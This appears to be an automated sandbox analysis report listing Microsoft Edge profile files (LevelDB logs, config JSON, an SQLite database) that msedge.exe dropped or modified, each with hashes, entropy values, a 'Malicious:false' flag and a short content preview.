                                                                                                                                                                                                                                                                                                MD5:673E399D95D314106680EE64DD446416
                                                                                                                                                                                                                                                                                                SHA1:040295E871D19F0EAB694225807CE5A4CA5760F1
                                                                                                                                                                                                                                                                                                SHA-256:7C0A577ADBCE503D42C4CEF4C8BFC9A3C2D3E59044FE9A9CC2F9C7453C3D0AF2
                                                                                                                                                                                                                                                                                                SHA-512:6D802FCFF27223E79666A220679CF55ADE911F426617641F756803DEC5750BDEAAED0CB4B828AC07D732872B4038F944F758E9B7E50FF41D41D8708410B7199D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:36.059 20f4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/20-01:31:36.192 20f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):358860
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.3246138696969805
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rj:C1gAg1zfvb
                                                                                                                                                                                                                                                                                                MD5:82C32DAA7BF65D4CD2A81E6AD6D09DFE
                                                                                                                                                                                                                                                                                                SHA1:0A3E0A05DE9FE51E184075A395A01105856DCFD0
                                                                                                                                                                                                                                                                                                SHA-256:30DFAD051336C38F9DC743C87547AB99A7BFE9B9D6E606A4DBAE30073CC7A9A4
                                                                                                                                                                                                                                                                                                SHA-512:02CD59DB8CAE7DB0BDB7077D4D85BAAEC8A4B4CC08753E442A3091F2C394BC5F145568E8E167C9155299E2A286F03489597DC70E0003BC9669B53C7D43BB37E2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.145492980879725
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PFsON+q2PN723oH+Tcwt8aPrqIFUt8IFuZmw+IWVFURVkwON723oH+Tcwt8amLJ:NsOIvVaYebL3FUt8cu/+Tu5OaYebQJ
                                                                                                                                                                                                                                                                                                MD5:BA241B233CB6FD4D4CE6EFD9DD913C32
                                                                                                                                                                                                                                                                                                SHA1:6610E84CD6D412C2294FA788135DF1AD75845839
                                                                                                                                                                                                                                                                                                SHA-256:7CC2084827BA1A93170DDE7F47EEBF9F78264FEFD819541C2CCF1EBFF3693D32
                                                                                                                                                                                                                                                                                                SHA-512:D48D1517294B7629A9425A1D5115F32A15D638563E7934F9EA8653C2D68A804DC2FEBD6A512E666F006BE3763C08085B540884EB8F9C3A8A2C0A178104400AA7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.396 1538 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/20-01:31:31.397 1538 Recovering log #3.2024/12/20-01:31:31.400 1538 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.145492980879725
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PFsON+q2PN723oH+Tcwt8aPrqIFUt8IFuZmw+IWVFURVkwON723oH+Tcwt8amLJ:NsOIvVaYebL3FUt8cu/+Tu5OaYebQJ
                                                                                                                                                                                                                                                                                                MD5:BA241B233CB6FD4D4CE6EFD9DD913C32
                                                                                                                                                                                                                                                                                                SHA1:6610E84CD6D412C2294FA788135DF1AD75845839
                                                                                                                                                                                                                                                                                                SHA-256:7CC2084827BA1A93170DDE7F47EEBF9F78264FEFD819541C2CCF1EBFF3693D32
                                                                                                                                                                                                                                                                                                SHA-512:D48D1517294B7629A9425A1D5115F32A15D638563E7934F9EA8653C2D68A804DC2FEBD6A512E666F006BE3763C08085B540884EB8F9C3A8A2C0A178104400AA7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.396 1538 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/20-01:31:31.397 1538 Recovering log #3.2024/12/20-01:31:31.400 1538 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):332
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.141999661671637
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PFN+q2PN723oH+Tcwt865IFUt8IUXBXZmw+IUTmNVkwON723oH+Tcwt86+ULJ:mvVaYeb/WFUt8zd/+zTmz5OaYeb/+SJ
                                                                                                                                                                                                                                                                                                MD5:787C374F89B39BC87F96464FF8037CB5
                                                                                                                                                                                                                                                                                                SHA1:32F63B4CA60E97B47D176601473E7060DA93CA52
                                                                                                                                                                                                                                                                                                SHA-256:AA6CCC2D78DF3BAEAB9249E4592D23D18C423420277FC2714E2E3E0E8DF5CE52
                                                                                                                                                                                                                                                                                                SHA-512:06C26F183797DCAF43FE6854E856967DFB640020EB7606C979E8BCE53AA1D439DAE32338EB93A4CD66E1B5E4ABE137B59F34C729F2E3929A5C5A003410AB52AE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.419 1538 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/20-01:31:31.423 1538 Recovering log #3.2024/12/20-01:31:31.426 1538 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):332
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.141999661671637
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PFN+q2PN723oH+Tcwt865IFUt8IUXBXZmw+IUTmNVkwON723oH+Tcwt86+ULJ:mvVaYeb/WFUt8zd/+zTmz5OaYeb/+SJ
                                                                                                                                                                                                                                                                                                MD5:787C374F89B39BC87F96464FF8037CB5
                                                                                                                                                                                                                                                                                                SHA1:32F63B4CA60E97B47D176601473E7060DA93CA52
                                                                                                                                                                                                                                                                                                SHA-256:AA6CCC2D78DF3BAEAB9249E4592D23D18C423420277FC2714E2E3E0E8DF5CE52
                                                                                                                                                                                                                                                                                                SHA-512:06C26F183797DCAF43FE6854E856967DFB640020EB7606C979E8BCE53AA1D439DAE32338EB93A4CD66E1B5E4ABE137B59F34C729F2E3929A5C5A003410AB52AE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.419 1538 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/20-01:31:31.423 1538 Recovering log #3.2024/12/20-01:31:31.426 1538 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1254
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):325
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.102840696919073
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:P7ly4q2PN723oH+Tcwt8NIFUt8I7lyJZmw+I7lyDkwON723oH+Tcwt8+eLJ:JRvVaYebpFUt8UM/+Us5OaYebqJ
                                                                                                                                                                                                                                                                                                MD5:0DB18570E643A357484EF996622443C3
                                                                                                                                                                                                                                                                                                SHA1:B99E3C6FED280C89C7410AF5B3990C711C79BE35
                                                                                                                                                                                                                                                                                                SHA-256:3B04613DBD747F70005D6F2325ECC71B96807AEFBD17BD2CE3C33AA5BA9B1300
                                                                                                                                                                                                                                                                                                SHA-512:78685BAA1D6C431B4842B5A8B562379E7A3F413EDA4E2F552C85CF5F1756FAACC0EB8BC7D5D2B53D2BE71DEA033BD11DE712E661129DF00A6D79FCCCADE94CA8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:32.217 650 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/20-01:31:32.217 650 Recovering log #3.2024/12/20-01:31:32.217 650 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):325
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.102840696919073
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:P7ly4q2PN723oH+Tcwt8NIFUt8I7lyJZmw+I7lyDkwON723oH+Tcwt8+eLJ:JRvVaYebpFUt8UM/+Us5OaYebqJ
                                                                                                                                                                                                                                                                                                MD5:0DB18570E643A357484EF996622443C3
                                                                                                                                                                                                                                                                                                SHA1:B99E3C6FED280C89C7410AF5B3990C711C79BE35
                                                                                                                                                                                                                                                                                                SHA-256:3B04613DBD747F70005D6F2325ECC71B96807AEFBD17BD2CE3C33AA5BA9B1300
                                                                                                                                                                                                                                                                                                SHA-512:78685BAA1D6C431B4842B5A8B562379E7A3F413EDA4E2F552C85CF5F1756FAACC0EB8BC7D5D2B53D2BE71DEA033BD11DE712E661129DF00A6D79FCCCADE94CA8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:32.217 650 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/20-01:31:32.217 650 Recovering log #3.2024/12/20-01:31:32.217 650 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):429
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.2191763562065486
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:c3/l7ntFlljq7A/mhWJFuQ3yy7IOWUsd4/dweytllrE9SFcTp4AGbNCV9RUIn:cPK75fOO2/d0Xi99pEYJ
                                                                                                                                                                                                                                                                                                MD5:F59BB4C98EDB34283601B3941E95EEE8
                                                                                                                                                                                                                                                                                                SHA1:F9FAAE2FF1075172E76541DEACCF0C8371084E0D
                                                                                                                                                                                                                                                                                                SHA-256:085B4FD994BDD4392CB7860C8B369BF5CC63BB67DB3C4805B6BD0B795341199D
                                                                                                                                                                                                                                                                                                SHA-512:D8F2F1C18E4631652F4ECA6180269FF12B144FA0839C8FED6D28BF41916744A2911AD8DDED2F63898FC99A20ED3152293C7F26CC55B1B235DEF3DF581A0631CE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.............+....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.647848568592449
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:aj9P07QkQerGjlt773pL1gam6I6P/KbtlcqRKToaADhf:adqe2clt7iKP/XqRKc39
                                                                                                                                                                                                                                                                                                MD5:A6209C9A931EDE8583EDD00022EE5200
                                                                                                                                                                                                                                                                                                SHA1:7E4F98EC98042DBD06B07DF60F67A994AF07D1A6
                                                                                                                                                                                                                                                                                                SHA-256:F82CDF6F2F2A3B733E629B928775DFAB40B25F4B25E62F9B785B0FA85E71CC30
                                                                                                                                                                                                                                                                                                SHA-512:95B0534FC3622A59AD694469A592F4EF7038541B9C41557AA1CE1BD3F2D5180CAD78D5B2AE44A28A8EF7424702BF0EE1790951E4F4BC1889145804C094C6E8D9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):409
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.2687467808755555
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:FsO4vVaYeb8rcHEZrELFUt86s4J/+6s4D5OaYeb8rcHEZrEZSJ:FeVaYeb8nZrExg86VTVVOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                MD5:55F63690315B5575A052496E6DDB87C2
                                                                                                                                                                                                                                                                                                SHA1:D57C87DB04260F6DD46517262BEE9A64424DD278
                                                                                                                                                                                                                                                                                                SHA-256:C0462AB7F90D8EE3E71208ED977BED036A64A35A433DDA7D3FC8480CEEA7F606
                                                                                                                                                                                                                                                                                                SHA-512:D569CE15865D3E452DBDDAD2F45F6D4D04440CFAF58524F965A4E0575FE6FB9BDD107E8BBCF3E0377B3E166C93FCF1CE8CDF15FCAE243AE4B1F85A2E2BBC3348
                                                                                                                                                                                                                                                                                                Malicious:false
